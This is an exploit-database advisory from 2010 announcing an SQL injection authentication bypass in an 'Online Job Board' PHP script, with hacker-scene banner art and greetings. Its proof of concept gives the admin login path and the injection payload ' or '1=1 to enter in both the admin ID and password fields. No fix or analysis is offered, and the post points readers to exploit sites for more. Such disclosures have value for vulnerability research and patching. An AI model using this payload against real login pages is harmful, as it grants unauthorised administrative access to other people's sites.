Online Job Board (Auth Bypass) SQL Injection Vulnerability



EDB-ID: 12691 CVE: N/A OSVDB-ID: N/A
Author: cr4wl3r Published: 2010-05-21 Verified: Verified
Exploit Code:   Download Vulnerable App:   N/A

Rating

(0.0)
Prev Home Next
                            \#'#/
                            (-.-)
   --------------------oOO---(_)---OOo-----------------------------
   |  Online Job Board (Auth Bypass) SQL Injection Vulnerability  |
   |           (works only with magic_quotes_gpc = off)           |
   ----------------------------------------------------------------
[!] Discovered: cr4wl3r <cr4wl3r[!]linuxmail.org>
[!] Homepage: http://h4ckb0x.org/
[!] Script: http://hostnomi.net/detail.php?spid=15

[!] Dork: no dork for script kiddies :p~
[!] Remote: yes

[x] PoC:

http://h4ckb0x.org/siteadmin/index.php

Admin ID: ' or '1=1
Password: ' or '1=1

[~] Greetz: r0073r, str0ke, opt!x hacker, xoron, Ricardo Almeida, cyberlog, irvian, zreg, k1n9k0ng, letjen, team_elite, wiro sableng, samuel MC, EA ngel, and all my friend
[~] Special to: Valentin Hobel (Happy Birthday brotha) ;)

[~] Visit: inj3ct0r.com, exploit-db.com for more exploits and to update the new exploits
[~] Regards: cr4wl3r